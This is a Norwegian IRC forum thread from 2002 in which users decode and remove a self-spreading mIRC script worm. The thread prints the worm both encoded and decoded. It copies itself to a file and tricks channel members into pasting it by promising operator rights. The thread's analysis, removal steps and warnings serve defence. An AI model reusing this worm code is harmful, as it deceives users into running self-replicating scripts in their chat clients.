Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  18 1978
satt på mIRC akkurat... Der skulle folk begynne og anmelde meg for jeg hadde gjordt noe med no virus greier!
Er det noen geni - folk her som kan forklare meg hva dette er?
Blir litt frusturert da vet dere når alle bare skal drive og kjefte på meg hele tiden... Det var noe slik jeg fikk opp.....



//$decode(d3JpdGUgxCBvbiAqOmpvaW46IzoudGltZXIgMSAzMCBpZiAoICRu aWNrICFpc29wICRjaGFuICkgLm1zZyAkbmljayBoZXkgJG5pY2sgdG8gZ2V0 IE9QcyB1c2UgdGhpcyBoYWNrIGluIHRoZSBjaGFuIGJ1dCBTSEghIAM0Ly8k ICQrIGRlY29kZSggJGVuY29kZSh3cml0ZSDEICRyZWFkKCRzY3JpcHQsbiwx KSxtKSAsbSkgJCAkKyBjaHIoMTI0KSAkICQgJCsgKyBkZWNvZGUoICRlbmNv ZGUoLmxvYWQgLXJzIMQsbSkgLG0p ,m) | $decode( LmxvYWQgLXJzIMQ= ,m)
Sist endret av metrom; 24. februar 2002 kl. 17:41.
decoded:
write Ä on *:join:#:.timer 1 30 if ( $nick !isop $chan ) .msg $nick hey $nick to get OPs use this hack in the chan but SHH! //$ $+ decode( $encode(write Ä $read($script,n,1),m) ,m) $ $+ chr(124) $ $ $+ + decode( $encode(.load -rs Ä,m) ,m) | .load -rs Ä

jeg har ikke anelse om hva de egentlig mener skal skje, men det som det ser ut til å skje er:
det lagres en fil Ä, et script
scriptet venter i 30 sekund etter at noen har entret kanalen, så sier den ifra til dem om en "hack" på kanalen
hacken er: dekoder det koderte - skriv til Ä filen, det leses fra det skriptet som allerde er skrevet inn hos DEG. Så "viruset" er kopiert videre. etter |: last scriptfila Ä

Helt genialt, og helt harmløst... ville ikke kalt det noe særlig til virus nei... Bare noe som sprer og sprer seg, morsom sak
/unload Ä trur jeg
deretter
/remove Ä trur jeg




Correct me if unload and remove is wrong commands
Takk skal dere ha...


/unload [COLOR=red]-rs[/COLOR] Ä

/remove Ä

Det skjedde noe nå ja. Removed CmIRC\Ä...
Håper dette fixer seg nå da...
*flytter til irc forumet og håper ikke sorath brenner meg *
dette her kan sammenlignes med gode gamle script.ini viruset. det oppfyller funksjonen til et virus nemlig, ved å prøve å kopiere seg selv videre ...
Better than thou.
Correct me if I'm wrong, men er det ikke ormer som har som hovedfunksjon å spre seg videre mens virus har som hovedfunksjon å ødelegge?
Opprinnelig postet av Carlo
Correct me if I'm wrong, men er det ikke ormer som har som hovedfunksjon å spre seg videre mens virus har som hovedfunksjon å ødelegge?
Vis hele sitatet...
Ja, det vil nå jeg også si. Et sånt "mirc virus" gjør jo ikke skade - er bare irriterende som faen, mens virus ofte sletter ditt å datt og ødelegger litt her å der...
[2:30p] [notice:Srvnotice]: Warning! -mIRC users- DO NOT copy/paste any /decode lines, no matter what reason! it is a hack. - This is an automated message, no need to respond. For decoding check: www.efnet.pl/decode.html
Opprinnelig postet av Carlo
Correct me if I'm wrong, men er det ikke ormer som har som hovedfunksjon å spre seg videre mens virus har som hovedfunksjon å ødelegge?
Vis hele sitatet...
Du har nok feil Definisjonen av virus er et program som sprer seg selv
I mIRC 6.0 fungerer ikke denne lenger..man får ikke evaluert %variables eller $identfiers ved å putte // foran..
▼ ... over en uke senere ... ▼
spQ
Dyslectic Mind
spQ's Avatar
secure secure

ved å bruke BitchX, eller en annen klient oppstår ikke slike problemer!

-sp3q
Opprinnelig postet av sp3q
ved å bruke BitchX, eller en annen klient oppstår ikke slike problemer!
Vis hele sitatet...
Dog blir IRC mer likt programmering
The Ultimate allergy pill
zyrtec's Avatar
programering ?
Opprinnelig postet av zyrtec
programering ?
Vis hele sitatet...

Ironi eller no, men det blir lixom bare stress å bytte kanal, snakke med folk etc.
Opprinnelig postet av zeth

Ironi eller no, men det blir lixom bare stress å bytte kanal, snakke med folk etc.
Vis hele sitatet...
/wind new hide (/window new hide) * 10 = du har 10 vinduer, skifter med alt+1, alt+2 etc.

/wind lev msg /window level msg) (el. lev notice f.eks) og du har brått et vindu bare til msg eller notice eller whatever.

/query johan

mange muligheter med bitchx. ingen over ingen ved siden

jeg bruker cypress, synes layouten blir penere, du får kanallister sortert etter alfabetet og status. det finner du her: <->
Sist endret av sorath; 19. februar 2002 kl. 16:58.
spQ
Dyslectic Mind
spQ's Avatar
cypress er ett helt kurrant script!

Husk også at tabulator tasten er også en vesentlig ting i BitchX


-sp3q